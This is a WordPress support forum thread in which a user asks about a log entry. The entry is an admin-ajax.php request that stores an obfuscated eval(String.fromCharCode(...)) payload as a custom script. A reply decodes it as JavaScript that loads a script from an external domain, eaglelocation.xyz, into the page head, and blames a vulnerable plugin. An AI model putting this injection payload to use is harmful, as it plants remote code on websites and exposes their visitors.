• It seems the issue is while accessing wp-admin. Please investigate.

    Let me know, why this error is occurring my log file.

    How to fix it?

    [03/May/2019 03:05:03] code 400, message Bad request syntax (‘GET /wp-admin/admin-ajax.php?action=fs_set_db_option&option_name=custom_script&option_value=eval(String.fromCharCode(118, 97, 114, 32, 100, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 10, 100, 46, 97, 115, 121, 110, 99, 61, 116, 114, 117, 101, 59, 10, 100, 46, 115, 114, 99, 61, 39, 104, 116, 116, 112, 115, 58, 47, 47, 101, 97, 103, 108, 101, 108, 111, 99, 97, 116, 105, 111, 110, 46, 120, 121, 122, 47, 115, 116, 97, 116, 115, 46, 106, 115, 39, 59, 10, 100, 46, 116, 121, 112, 101, 61, 39, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 39, 59, 10, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 34, 104, 101, 97, 100, 34, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 100, 41, 59)); HTTP/1.1’) – – –

    The page I need help with: [log in to see the link]

Viewing 1 replies (of 1 total)
  • That request is to put a javascript into your database. It does not look like a good thing, because it is sending statistics to an external site. The code says

    var d = document.createElement('script');
    d.async=true;
    d.src='https://eaglelocation.xyz/stats.js';
    d.type='text/javascript';
    document.getElementsByTagName("head")[0].appendChild(d);

    So either you have a plugin with a problem that is being exploited, or a plugin with a bad way of doing things and collecting statistics. Probably has initials of FS.

Viewing 1 replies (of 1 total)

The topic ‘bad request error for Admin ajax php file’ is closed to new replies.